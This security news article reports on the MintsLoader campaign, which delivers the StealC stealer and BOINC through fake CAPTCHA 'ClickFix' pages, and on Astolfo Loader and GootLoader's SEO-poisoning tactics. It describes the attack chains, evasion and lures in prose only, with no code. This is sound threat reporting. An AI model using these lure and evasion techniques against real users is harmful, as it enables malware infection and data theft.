Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.
“MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,” cybersecurity firm eSentire said in an analysis.
The campaign has targeted electricity, oil and gas, and the legal services sectors in the United States and Europe, per the company, which detected the activity in early January 2025.
The development comes amid a spike in malicious campaigns that are abusing fake CAPTCHA verification prompts to trick users into copying and executing PowerShell scripts to get around the checks, a technique that has come to be known ClickFix and KongTuke.
“KongTuke involves an injected script that currently causes associated websites to display fake ‘verify you are human’ pages,” Palo Alto Networks Unit 42 said in a report detailing a similar campaign distributing BOINC.
“These fake verification pages load a potential victim’s Windows copy/paste buffer with malicious PowerShell script. The page also gives detailed instructions asking potential victims to paste and execute the script in a Run window.”
The attack chain documented by eSentire starts when users click on a link in a spam email, leading to the download of an obfuscated JavaScript file. The script is responsible for running a PowerShell command to download MintsLoader via curl and execute it, after which it deletes itself from the host to avoid leaving traces.
Alternate sequences redirect the message recipients to ClickFix-style pages that lead to the delivery of MintsLoader by means of the Windows Run prompt.
The loader malware, in turn, contacts a command-and-control (C2) server to fetch interim PowerShell payloads that performs various checks to evade sandboxes and resist analysis efforts. It also features a Domain Generation Algorithm (DGA) with a seed value based on the addition of the current day of the month to create the C2 domain name.
The attack culminates with the deployment of StealC, an information stealer sold under the malware-as-a-service (MaaS) model since early 2023. It’s assessed to be re-engineered from another stealer malware known as Arkei. One of the notable features of the malware is its ability to avoid infecting machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.
News of the MintsLoader campaign also follows the emergence of an updated version of the JinxLoader dubbed Astolfo Loader (aka Jinx V3) that has been rewritten in C++ likely for performance reasons after its source code was sold off by the malware author Rendnza to two separate buyers Delfin and AstolfoLoader.
“While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary,” BlackBerry noted late last year.
“Services like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such tools can proliferate quickly and affordably and can be purchased via popular public hacking forums that are accessible to virtually anyone with an Internet connection.”
Cybersecurity researchers have also shed light on the inner workings of the GootLoader malware campaigns, which are known to weaponize search engine optimization (SEO) poisoning to redirect victims searching for agreements and contracts to compromised WordPress sites that host a realistic-looking message board to download a file that contains what they are purportedly looking for.
The malware operators have been found to make changes to the WordPress sites that cause those sites to dynamically load the fake forum page content from another server, referred to as the “mothership” by Sophos.
GootLoader campaigns, besides geofencing IP address ranges and allowing requests to originate from specific countries of interest, go further by permitting the potential victim to visit the infected site only once in 24 hours by adding the IP to a block list.
“Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often cannot identify the modifications in their own site or trigger the GootLoader code to run when they visit their own pages,” security researcher Gabor Szappanos said.
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
The Hacker News
